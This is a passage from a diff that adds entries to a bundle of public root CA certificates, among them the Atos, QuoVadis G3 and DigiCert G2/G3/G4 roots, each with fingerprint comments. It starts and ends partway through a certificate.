+QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBS/
+WSA2AHmgoCJrjNXyYdK4LMuCSjANBgkqhkiG9w0BAQsFAAOCAQEAMQOiYQsfdOhy
+NsZt+U2e+iKo4YFWz827n+qrkRk4r6p8FU3ztqONpfSO9kSpp+ghla0+AGIWiPAC
+uvxhI+YzmzB6azZie60EI4RYZeLbK4rnJVM3YlNfvNoBYimipidx5joifsFvHZVw
+IEoHNN/q/xWA5brXethbdXwFeilHfkCoMRN3zUA7tFFHei4R40cR3p1m0IvVVGb6
+g1XqfMIpiRvpb7PO4gWEyS8+eIVibslfwXhjdFjASBgMmTnrpMwatXlajRWc2BQN
+9noHV8cigwUtPJslJj0Ys6lDfMjIq2SPDqO/nBudMNva0Bkuqjzx+zOAduTNrRlP
+BSeOE6Fuwg==
+-----END CERTIFICATE-----
+
+# Issuer: CN=Atos TrustedRoot 2011 O=Atos
+# Subject: CN=Atos TrustedRoot 2011 O=Atos
+# Label: "Atos TrustedRoot 2011"
+# Serial: 6643877497813316402
+# MD5 Fingerprint: ae:b9:c4:32:4b:ac:7f:5d:66:cc:77:94:bb:2a:77:56
+# SHA1 Fingerprint: 2b:b1:f5:3e:55:0c:1d:c5:f1:d4:e6:b7:6a:46:4b:55:06:02:ac:21
+# SHA256 Fingerprint: f3:56:be:a2:44:b7:a9:1e:b3:5d:53:ca:9a:d7:86:4a:ce:01:8e:2d:35:d5:f8:f9:6d:df:68:a6:f4:1a:a4:74
+-----BEGIN CERTIFICATE-----
+MIIDdzCCAl+gAwIBAgIIXDPLYixfszIwDQYJKoZIhvcNAQELBQAwPDEeMBwGA1UE
+AwwVQXRvcyBUcnVzdGVkUm9vdCAyMDExMQ0wCwYDVQQKDARBdG9zMQswCQYDVQQG
+EwJERTAeFw0xMTA3MDcxNDU4MzBaFw0zMDEyMzEyMzU5NTlaMDwxHjAcBgNVBAMM
+FUF0b3MgVHJ1c3RlZFJvb3QgMjAxMTENMAsGA1UECgwEQXRvczELMAkGA1UEBhMC
+REUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCVhTuXbyo7LjvPpvMp
+Nb7PGKw+qtn4TaA+Gke5vJrf8v7MPkfoepbCJI419KkM/IL9bcFyYie96mvr54rM
+VD6QUM+A1JX76LWC1BTFtqlVJVfbsVD2sGBkWXppzwO3bw2+yj5vdHLqqjAqc2K+
+SZFhyBH+DgMq92og3AIVDV4VavzjgsG1xZ1kCWyjWZgHJ8cblithdHFsQ/H3NYkQ
+4J7sVaE3IqKHBAUsR320HLliKWYoyrfhk/WklAOZuXCFteZI6o1Q/NnezG8HDt0L
+cp2AMBYHlT8oDv3FdU9T1nSatCQujgKRz3bFmx5VdJx4IbHwLfELn8LVlhgf8FQi
+eowHAgMBAAGjfTB7MB0GA1UdDgQWBBSnpQaxLKYJYO7Rl+lwrrw7GWzbITAPBgNV
+HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFKelBrEspglg7tGX6XCuvDsZbNshMBgG
+A1UdIAQRMA8wDQYLKwYBBAGwLQMEAQEwDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3
+DQEBCwUAA4IBAQAmdzTblEiGKkGdLD4GkGDEjKwLVLgfuXvTBznk+j57sj1O7Z8j
+vZfza1zv7v1Apt+hk6EKhqzvINB5Ab149xnYJDE0BAGmuhWawyfc2E8PzBhj/5kP
+DpFrdRbhIfzYJsdHt6bPWHJxfrrhTZVHO8mvbaG0weyJ9rQPOLXiZNwlz6bb65pc
+maHFCN795trV1lpFDMS3wrUU77QR/w4VtfX128a961qn8FYiqTxlVMYVqL2Gns2D
+lmh6cYGJ4Qvh6hEbaAjMaZ7snkGeRDImeuKHCnE96+RapNLbxc3G3mB/ufNPRJLv
+KrcYPqcZ2Qt9sTdBQrC6YB3y/gkRsPCHe6ed
+-----END CERTIFICATE-----
+
+# Issuer: CN=QuoVadis Root CA 1 G3 O=QuoVadis Limited
+# Subject: CN=QuoVadis Root CA 1 G3 O=QuoVadis Limited
+# Label: "QuoVadis Root CA 1 G3"
+# Serial: 687049649626669250736271037606554624078720034195
+# MD5 Fingerprint: a4:bc:5b:3f:fe:37:9a:fa:64:f0:e2:fa:05:3d:0b:ab
+# SHA1 Fingerprint: 1b:8e:ea:57:96:29:1a:c9:39:ea:b8:0a:81:1a:73:73:c0:93:79:67
+# SHA256 Fingerprint: 8a:86:6f:d1:b2:76:b5:7e:57:8e:92:1c:65:82:8a:2b:ed:58:e9:f2:f2:88:05:41:34:b7:f1:f4:bf:c9:cc:74
+-----BEGIN CERTIFICATE-----
+MIIFYDCCA0igAwIBAgIUeFhfLq0sGUvjNwc1NBMotZbUZZMwDQYJKoZIhvcNAQEL
+BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc
+BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMSBHMzAeFw0xMjAxMTIxNzI3NDRaFw00
+MjAxMTIxNzI3NDRaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM
+aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDEgRzMwggIiMA0GCSqG
+SIb3DQEBAQUAA4ICDwAwggIKAoICAQCgvlAQjunybEC0BJyFuTHK3C3kEakEPBtV
+wedYMB0ktMPvhd6MLOHBPd+C5k+tR4ds7FtJwUrVu4/sh6x/gpqG7D0DmVIB0jWe
+rNrwU8lmPNSsAgHaJNM7qAJGr6Qc4/hzWHa39g6QDbXwz8z6+cZM5cOGMAqNF341
+68Xfuw6cwI2H44g4hWf6Pser4BOcBRiYz5P1sZK0/CPTz9XEJ0ngnjybCKOLXSoh
+4Pw5qlPafX7PGglTvF0FBM+hSo+LdoINofjSxxR3W5A2B4GbPgb6Ul5jxaYA/qXp
+UhtStZI5cgMJYr2wYBZupt0lwgNm3fME0UDiTouG9G/lg6AnhF4EwfWQvTA9xO+o
+abw4m6SkltFi2mnAAZauy8RRNOoMqv8hjlmPSlzkYZqn0ukqeI1RPToV7qJZjqlc
+3sX5kCLliEVx3ZGZbHqfPT2YfF72vhZooF6uCyP8Wg+qInYtyaEQHeTTRCOQiJ/G
+KubX9ZqzWB4vMIkIG1SitZgj7Ah3HJVdYdHLiZxfokqRmu8hqkkWCKi9YSgxyXSt
+hfbZxbGL0eUQMk1fiyA6PEkfM4VZDdvLCXVDaXP7a3F98N/ETH3Goy7IlXnLc6KO
+Tk0k+17kBL5yG6YnLUlamXrXXAkgt3+UuU/xDRxeiEIbEbfnkduebPRq34wGmAOt
+zCjvpUfzUwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB
+BjAdBgNVHQ4EFgQUo5fW816iEOGrRZ88F2Q87gFwnMwwDQYJKoZIhvcNAQELBQAD
+ggIBABj6W3X8PnrHX3fHyt/PX8MSxEBd1DKquGrX1RUVRpgjpeaQWxiZTOOtQqOC
+MTaIzen7xASWSIsBx40Bz1szBpZGZnQdT+3Btrm0DWHMY37XLneMlhwqI2hrhVd2
+cDMT/uFPpiN3GPoajOi9ZcnPP/TJF9zrx7zABC4tRi9pZsMbj/7sPtPKlL92CiUN
+qXsCHKnQO18LwIE6PWThv6ctTr1NxNgpxiIY0MWscgKCP6o6ojoilzHdCGPDdRS5
+YCgtW2jgFqlmgiNR9etT2DGbe+m3nUvriBbP+V04ikkwj+3x6xn0dxoxGE1nVGwv
+b2X52z3sIexe9PSLymBlVNFxZPT5pqOBMzYzcfCkeF9OrYMh3jRJjehZrJ3ydlo2
+8hP0r+AJx2EqbPfgna67hkooby7utHnNkDPDs3b69fBsnQGQ+p6Q9pxyz0fawx/k
+NSBT8lTR32GDpgLiJTjehTItXnOQUl1CxM49S+H5GYQd1aJQzEH7QRTDvdbJWqNj
+ZgKAvQU6O0ec7AAmTPWIUb+oI38YB7AL7YsmoWTTYUrrXJ/es69nA7Mf3W1daWhp
+q1467HxpvMc7hU6eFbm0FU/DlXpY18ls6Wy58yljXrQs8C097Vpl4KlbQMJImYFt
+nh8GKjwStIsPm6Ik8KaN1nrgS7ZklmOVhMJKzRwuJIczYOXD
+-----END CERTIFICATE-----
+
+# Issuer: CN=QuoVadis Root CA 2 G3 O=QuoVadis Limited
+# Subject: CN=QuoVadis Root CA 2 G3 O=QuoVadis Limited
+# Label: "QuoVadis Root CA 2 G3"
+# Serial: 390156079458959257446133169266079962026824725800
+# MD5 Fingerprint: af:0c:86:6e:bf:40:2d:7f:0b:3e:12:50:ba:12:3d:06
+# SHA1 Fingerprint: 09:3c:61:f3:8b:8b:dc:7d:55:df:75:38:02:05:00:e1:25:f5:c8:36
+# SHA256 Fingerprint: 8f:e4:fb:0a:f9:3a:4d:0d:67:db:0b:eb:b2:3e:37:c7:1b:f3:25:dc:bc:dd:24:0e:a0:4d:af:58:b4:7e:18:40
+-----BEGIN CERTIFICATE-----
+MIIFYDCCA0igAwIBAgIURFc0JFuBiZs18s64KztbpybwdSgwDQYJKoZIhvcNAQEL
+BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc
+BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMiBHMzAeFw0xMjAxMTIxODU5MzJaFw00
+MjAxMTIxODU5MzJaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM
+aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDIgRzMwggIiMA0GCSqG
+SIb3DQEBAQUAA4ICDwAwggIKAoICAQChriWyARjcV4g/Ruv5r+LrI3HimtFhZiFf
+qq8nUeVuGxbULX1QsFN3vXg6YOJkApt8hpvWGo6t/x8Vf9WVHhLL5hSEBMHfNrMW
+n4rjyduYNM7YMxcoRvynyfDStNVNCXJJ+fKH46nafaF9a7I6JaltUkSs+L5u+9ym
+c5GQYaYDFCDy54ejiK2toIz/pgslUiXnFgHVy7g1gQyjO/Dh4fxaXc6AcW34Sas+
+O7q414AB+6XrW7PFXmAqMaCvN+ggOp+oMiwMzAkd056OXbxMmO7FGmh77FOm6RQ1
+o9/NgJ8MSPsc9PG/Srj61YxxSscfrf5BmrODXfKEVu+lV0POKa2Mq1W/xPtbAd0j
+IaFYAI7D0GoT7RPjEiuA3GfmlbLNHiJuKvhB1PLKFAeNilUSxmn1uIZoL1NesNKq
+IcGY5jDjZ1XHm26sGahVpkUG0CM62+tlXSoREfA7T8pt9DTEceT/AFr2XK4jYIVz
+8eQQsSWu1ZK7E8EM4DnatDlXtas1qnIhO4M15zHfeiFuuDIIfR0ykRVKYnLP43eh
+vNURG3YBZwjgQQvD6xVu+KQZ2aKrr+InUlYrAoosFCT5v0ICvybIxo/gbjh9Uy3l
+7ZizlWNof/k19N+IxWA1ksB8aRxhlRbQ694Lrz4EEEVlWFA4r0jyWbYW8jwNkALG
+cC4BrTwV1wIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB
+BjAdBgNVHQ4EFgQU7edvdlq/YOxJW8ald7tyFnGbxD0wDQYJKoZIhvcNAQELBQAD
+ggIBAJHfgD9DCX5xwvfrs4iP4VGyvD11+ShdyLyZm3tdquXK4Qr36LLTn91nMX66
+AarHakE7kNQIXLJgapDwyM4DYvmL7ftuKtwGTTwpD4kWilhMSA/ohGHqPHKmd+RC
+roijQ1h5fq7KpVMNqT1wvSAZYaRsOPxDMuHBR//47PERIjKWnML2W2mWeyAMQ0Ga
+W/ZZGYjeVYg3UQt4XAoeo0L9x52ID8DyeAIkVJOviYeIyUqAHerQbj5hLja7NQ4n
+lv1mNDthcnPxFlxHBlRJAHpYErAK74X9sbgzdWqTHBLmYF5vHX/JHyPLhGGfHoJE
++V+tYlUkmlKY7VHnoX6XOuYvHxHaU4AshZ6rNRDbIl9qxV6XU/IyAgkwo1jwDQHV
+csaxfGl7w/U2Rcxhbl5MlMVerugOXou/983g7aEOGzPuVBj+D77vfoRrQ+NwmNtd
+dbINWQeFFSM51vHfqSYP1kjHs6Yi9TM3WpVHn3u6GBVv/9YUZINJ0gpnIdsPNWNg
+KCLjsZWDzYWm3S8P52dSbrsvhXz1SnPnxT7AvSESBT/8twNJAlvIJebiVDj1eYeM
+HVOyToV7BjjHLPj4sHKNJeV3UvQDHEimUF+IIDBu8oJDqz2XhOdT+yHBTw8imoa4
+WSr2Rz0ZiC3oheGe7IUIarFsNMkd7EgrO3jtZsSOeWmD3n+M
+-----END CERTIFICATE-----
+
+# Issuer: CN=QuoVadis Root CA 3 G3 O=QuoVadis Limited
+# Subject: CN=QuoVadis Root CA 3 G3 O=QuoVadis Limited
+# Label: "QuoVadis Root CA 3 G3"
+# Serial: 268090761170461462463995952157327242137089239581
+# MD5 Fingerprint: df:7d:b9:ad:54:6f:68:a1:df:89:57:03:97:43:b0:d7
+# SHA1 Fingerprint: 48:12:bd:92:3c:a8:c4:39:06:e7:30:6d:27:96:e6:a4:cf:22:2e:7d
+# SHA256 Fingerprint: 88:ef:81:de:20:2e:b0:18:45:2e:43:f8:64:72:5c:ea:5f:bd:1f:c2:d9:d2:05:73:07:09:c5:d8:b8:69:0f:46
+-----BEGIN CERTIFICATE-----
+MIIFYDCCA0igAwIBAgIULvWbAiin23r/1aOp7r0DoM8Sah0wDQYJKoZIhvcNAQEL
+BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc
+BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMyBHMzAeFw0xMjAxMTIyMDI2MzJaFw00
+MjAxMTIyMDI2MzJaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM
+aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDMgRzMwggIiMA0GCSqG
+SIb3DQEBAQUAA4ICDwAwggIKAoICAQCzyw4QZ47qFJenMioKVjZ/aEzHs286IxSR
+/xl/pcqs7rN2nXrpixurazHb+gtTTK/FpRp5PIpM/6zfJd5O2YIyC0TeytuMrKNu
+FoM7pmRLMon7FhY4futD4tN0SsJiCnMK3UmzV9KwCoWdcTzeo8vAMvMBOSBDGzXR
+U7Ox7sWTaYI+FrUoRqHe6okJ7UO4BUaKhvVZR74bbwEhELn9qdIoyhA5CcoTNs+c
+ra1AdHkrAj80//ogaX3T7mH1urPnMNA3I4ZyYUUpSFlob3emLoG+B01vr87ERROR
+FHAGjx+f+IdpsQ7vw4kZ6+ocYfx6bIrc1gMLnia6Et3UVDmrJqMz6nWB2i3ND0/k
+A9HvFZcba5DFApCTZgIhsUfei5pKgLlVj7WiL8DWM2fafsSntARE60f75li59wzw
+eyuxwHApw0BiLTtIadwjPEjrewl5qW3aqDCYz4ByA4imW0aucnl8CAMhZa634Ryl
+sSqiMd5mBPfAdOhx3v89WcyWJhKLhZVXGqtrdQtEPREoPHtht+KPZ0/l7DxMYIBp
+VzgeAVuNVejH38DMdyM0SXV89pgR6y3e7UEuFAUCf+D+IOs15xGsIs5XPd7JMG0Q
+A4XN8f+MFrXBsj6IbGB/kE+V9/YtrQE5BwT6dYB9v0lQ7e/JxHwc64B+27bQ3RP+
+ydOc17KXqQIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB
+BjAdBgNVHQ4EFgQUxhfQvKjqAkPyGwaZXSuQILnXnOQwDQYJKoZIhvcNAQELBQAD
+ggIBADRh2Va1EodVTd2jNTFGu6QHcrxfYWLopfsLN7E8trP6KZ1/AvWkyaiTt3px
+KGmPc+FSkNrVvjrlt3ZqVoAh313m6Tqe5T72omnHKgqwGEfcIHB9UqM+WXzBusnI
+FUBhynLWcKzSt/Ac5IYp8M7vaGPQtSCKFWGafoaYtMnCdvvMujAWzKNhxnQT5Wvv
+oxXqA/4Ti2Tk08HS6IT7SdEQTXlm66r99I0xHnAUrdzeZxNMgRVhvLfZkXdxGYFg
+u/BYpbWcC/ePIlUnwEsBbTuZDdQdm2NnL9DuDcpmvJRPpq3t/O5jrFc/ZSXPsoaP
+0Aj/uHYUbt7lJ+yreLVTubY/6CD50qi+YUbKh4yE8/nxoGibIh6BJpsQBJFxwAYf
+3KDTuVan45gtf4Od34wrnDKOMpTwATwiKp9Dwi7DmDkHOHv8XgBCH/MyJnmDhPbl
+8MFREsALHgQjDFSlTC9JxUrRtm5gDWv8a4uFJGS3iQ6rJUdbPM9+Sb3H6QrG2vd+
+DhcI00iX0HGS8A85PjRqHH3Y8iKuu2n0M7SmSFXRDw4m6Oy2Cy2nhTXN/VnIn9HN
+PlopNLk9hM6xZdRZkZFWdSHBd575euFgndOtBBj0fOtek49TSiIp+EgrPk2GrFt/
+ywaZWWDYWGWVjUTR939+J399roD1B0y2PpxxVJkES/1Y+Zj0
+-----END CERTIFICATE-----
+
+# Issuer: CN=DigiCert Assured ID Root G2 O=DigiCert Inc OU=www.digicert.com
+# Subject: CN=DigiCert Assured ID Root G2 O=DigiCert Inc OU=www.digicert.com
+# Label: "DigiCert Assured ID Root G2"
+# Serial: 15385348160840213938643033620894905419
+# MD5 Fingerprint: 92:38:b9:f8:63:24:82:65:2c:57:33:e6:fe:81:8f:9d
+# SHA1 Fingerprint: a1:4b:48:d9:43:ee:0a:0e:40:90:4f:3c:e0:a4:c0:91:93:51:5d:3f
+# SHA256 Fingerprint: 7d:05:eb:b6:82:33:9f:8c:94:51:ee:09:4e:eb:fe:fa:79:53:a1:14:ed:b2:f4:49:49:45:2f:ab:7d:2f:c1:85
+-----BEGIN CERTIFICATE-----
+MIIDljCCAn6gAwIBAgIQC5McOtY5Z+pnI7/Dr5r0SzANBgkqhkiG9w0BAQsFADBl
+MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
+d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
+b3QgRzIwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQG
+EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
+cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzIwggEi
+MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDZ5ygvUj82ckmIkzTz+GoeMVSA
+n61UQbVH35ao1K+ALbkKz3X9iaV9JPrjIgwrvJUXCzO/GU1BBpAAvQxNEP4Htecc
+biJVMWWXvdMX0h5i89vqbFCMP4QMls+3ywPgym2hFEwbid3tALBSfK+RbLE4E9Hp
+EgjAALAcKxHad3A2m67OeYfcgnDmCXRwVWmvo2ifv922ebPynXApVfSr/5Vh88lA
+bx3RvpO704gqu52/clpWcTs/1PPRCv4o76Pu2ZmvA9OPYLfykqGxvYmJHzDNw6Yu
+YjOuFgJ3RFrngQo8p0Quebg/BLxcoIfhG69Rjs3sLPr4/m3wOnyqi+RnlTGNAgMB
+AAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQW
+BBTOw0q5mVXyuNtgv6l+vVa1lzan1jANBgkqhkiG9w0BAQsFAAOCAQEAyqVVjOPI
+QW5pJ6d1Ee88hjZv0p3GeDgdaZaikmkuOGybfQTUiaWxMTeKySHMq2zNixya1r9I
+0jJmwYrA8y8678Dj1JGG0VDjA9tzd29KOVPt3ibHtX2vK0LRdWLjSisCx1BL4Gni
+lmwORGYQRI+tBev4eaymG+g3NJ1TyWGqolKvSnAWhsI6yLETcDbYz+70CjTVW0z9
+B5yiutkBclzzTcHdDrEcDcRjvq30FPuJ7KJBDkzMyFdA0G4Dqs0MjomZmWzwPDCv
+ON9vvKO+KSAnq3T/EyJ43pdSVR6DtVQgA+6uwE9W3jfMw3+qBCe703e4YtsXfJwo
+IhNzbM8m9Yop5w==
+-----END CERTIFICATE-----
+
+# Issuer: CN=DigiCert Assured ID Root G3 O=DigiCert Inc OU=www.digicert.com
+# Subject: CN=DigiCert Assured ID Root G3 O=DigiCert Inc OU=www.digicert.com
+# Label: "DigiCert Assured ID Root G3"
+# Serial: 15459312981008553731928384953135426796
+# MD5 Fingerprint: 7c:7f:65:31:0c:81:df:8d:ba:3e:99:e2:5c:ad:6e:fb
+# SHA1 Fingerprint: f5:17:a2:4f:9a:48:c6:c9:f8:a2:00:26:9f:dc:0f:48:2c:ab:30:89
+# SHA256 Fingerprint: 7e:37:cb:8b:4c:47:09:0c:ab:36:55:1b:a6:f4:5d:b8:40:68:0f:ba:16:6a:95:2d:b1:00:71:7f:43:05:3f:c2
+-----BEGIN CERTIFICATE-----
+MIICRjCCAc2gAwIBAgIQC6Fa+h3foLVJRK/NJKBs7DAKBggqhkjOPQQDAzBlMQsw
+CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu
+ZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3Qg
+RzMwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQGEwJV
+UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu
+Y29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzMwdjAQBgcq
+hkjOPQIBBgUrgQQAIgNiAAQZ57ysRGXtzbg/WPuNsVepRC0FFfLvC/8QdJ+1YlJf
+Zn4f5dwbRXkLzMZTCp2NXQLZqVneAlr2lSoOjThKiknGvMYDOAdfVdp+CW7if17Q
+RSAPWXYQ1qAk8C3eNvJsKTmjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/
+BAQDAgGGMB0GA1UdDgQWBBTL0L2p4ZgFUaFNN6KDec6NHSrkhDAKBggqhkjOPQQD
+AwNnADBkAjAlpIFFAmsSS3V0T8gj43DydXLefInwz5FyYZ5eEJJZVrmDxxDnOOlY
+JjZ91eQ0hjkCMHw2U/Aw5WJjOpnitqM7mzT6HtoQknFekROn3aRukswy1vUhZscv
+6pZjamVFkpUBtA==
+-----END CERTIFICATE-----
+
+# Issuer: CN=DigiCert Global Root G2 O=DigiCert Inc OU=www.digicert.com
+# Subject: CN=DigiCert Global Root G2 O=DigiCert Inc OU=www.digicert.com
+# Label: "DigiCert Global Root G2"
+# Serial: 4293743540046975378534879503202253541
+# MD5 Fingerprint: e4:a6:8a:c8:54:ac:52:42:46:0a:fd:72:48:1b:2a:44
+# SHA1 Fingerprint: df:3c:24:f9:bf:d6:66:76:1b:26:80:73:fe:06:d1:cc:8d:4f:82:a4
+# SHA256 Fingerprint: cb:3c:cb:b7:60:31:e5:e0:13:8f:8d:d3:9a:23:f9:de:47:ff:c3:5e:43:c1:14:4c:ea:27:d4:6a:5a:b1:cb:5f
+-----BEGIN CERTIFICATE-----
+MIIDjjCCAnagAwIBAgIQAzrx5qcRqaC7KGSxHQn65TANBgkqhkiG9w0BAQsFADBh
+MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
+d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBH
+MjAeFw0xMzA4MDExMjAwMDBaFw0zODAxMTUxMjAwMDBaMGExCzAJBgNVBAYTAlVT
+MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j
+b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IEcyMIIBIjANBgkqhkiG
+9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuzfNNNx7a8myaJCtSnX/RrohCgiN9RlUyfuI
+2/Ou8jqJkTx65qsGGmvPrC3oXgkkRLpimn7Wo6h+4FR1IAWsULecYxpsMNzaHxmx
+1x7e/dfgy5SDN67sH0NO3Xss0r0upS/kqbitOtSZpLYl6ZtrAGCSYP9PIUkY92eQ
+q2EGnI/yuum06ZIya7XzV+hdG82MHauVBJVJ8zUtluNJbd134/tJS7SsVQepj5Wz
+tCO7TG1F8PapspUwtP1MVYwnSlcUfIKdzXOS0xZKBgyMUNGPHgm+F6HmIcr9g+UQ
+vIOlCsRnKPZzFBQ9RnbDhxSJITRNrw9FDKZJobq7nMWxM4MphQIDAQABo0IwQDAP
+BgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNVHQ4EFgQUTiJUIBiV
+5uNu5g/6+rkS7QYXjzkwDQYJKoZIhvcNAQELBQADggEBAGBnKJRvDkhj6zHd6mcY
+1Yl9PMWLSn/pvtsrF9+wX3N3KjITOYFnQoQj8kVnNeyIv/iPsGEMNKSuIEyExtv4
+NeF22d+mQrvHRAiGfzZ0JFrabA0UWTW98kndth/Jsw1HKj2ZL7tcu7XUIOGZX1NG
+Fdtom/DzMNU+MeKNhJ7jitralj41E6Vf8PlwUHBHQRFXGU7Aj64GxJUTFy8bJZ91
+8rGOmaFvE7FBcf6IKshPECBV1/MUReXgRPTqh5Uykw7+U0b6LJ3/iyK5S9kJRaTe
+pLiaWN0bfVKfjllDiIGknibVb63dDcY3fe0Dkhvld1927jyNxF1WW6LZZm6zNTfl
+MrY=
+-----END CERTIFICATE-----
+
+# Issuer: CN=DigiCert Global Root G3 O=DigiCert Inc OU=www.digicert.com
+# Subject: CN=DigiCert Global Root G3 O=DigiCert Inc OU=www.digicert.com
+# Label: "DigiCert Global Root G3"
+# Serial: 7089244469030293291760083333884364146
+# MD5 Fingerprint: f5:5d:a4:50:a5:fb:28:7e:1e:0f:0d:cc:96:57:56:ca
+# SHA1 Fingerprint: 7e:04:de:89:6a:3e:66:6d:00:e6:87:d3:3f:fa:d9:3b:e8:3d:34:9e
+# SHA256 Fingerprint: 31:ad:66:48:f8:10:41:38:c7:38:f3:9e:a4:32:01:33:39:3e:3a:18:cc:02:29:6e:f9:7c:2a:c9:ef:67:31:d0
+-----BEGIN CERTIFICATE-----
+MIICPzCCAcWgAwIBAgIQBVVWvPJepDU1w6QP1atFcjAKBggqhkjOPQQDAzBhMQsw
+CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu
+ZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBHMzAe
+Fw0xMzA4MDExMjAwMDBaFw0zODAxMTUxMjAwMDBaMGExCzAJBgNVBAYTAlVTMRUw
+EwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20x
+IDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IEczMHYwEAYHKoZIzj0CAQYF
+K4EEACIDYgAE3afZu4q4C/sLfyHS8L6+c/MzXRq8NOrexpu80JX28MzQC7phW1FG
+fp4tn+6OYwwX7Adw9c+ELkCDnOg/QW07rdOkFFk2eJ0DQ+4QE2xy3q6Ip6FrtUPO
+Z9wj/wMco+I+o0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAd
+BgNVHQ4EFgQUs9tIpPmhxdiuNkHMEWNpYim8S8YwCgYIKoZIzj0EAwMDaAAwZQIx
+AK288mw/EkrRLTnDCgmXc/SINoyIJ7vmiI1Qhadj+Z4y3maTD/HMsQmP3Wyr+mt/
+oAIwOWZbwmSNuJ5Q3KjVSaLtx9zRSX8XAbjIho9OjIgrqJqpisXRAL34VOKa5Vt8
+sycX
+-----END CERTIFICATE-----
+
+# Issuer: CN=DigiCert Trusted Root G4 O=DigiCert Inc OU=www.digicert.com
+# Subject: CN=DigiCert Trusted Root G4 O=DigiCert Inc OU=www.digicert.com
+# Label: "DigiCert Trusted Root G4"
+# Serial: 7451500558977370777930084869016614236
+# MD5 Fingerprint: 78:f2:fc:aa:60:1f:2f:b4:eb:c9:37:ba:53:2e:75:49
+# SHA1 Fingerprint: dd:fb:16:cd:49:31:c9:73:a2:03:7d:3f:c8:3a:4d:7d:77:5d:05:e4
+# SHA256 Fingerprint: 55:2f:7b:dc:f1:a7:af:9e:6c:e6:72:01:7f:4f:12:ab:f7:72:40:c7:8e:76:1a:c2:03:d1:d9:d2:0a:c8:99:88
+-----BEGIN CERTIFICATE-----
+MIIFkDCCA3igAwIBAgIQBZsbV56OITLiOQe9p3d1XDANBgkqhkiG9w0BAQwFADBi
+MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
+d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3Qg
+RzQwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBiMQswCQYDVQQGEwJV
+UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu
+Y29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqG
+SIb3DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3y
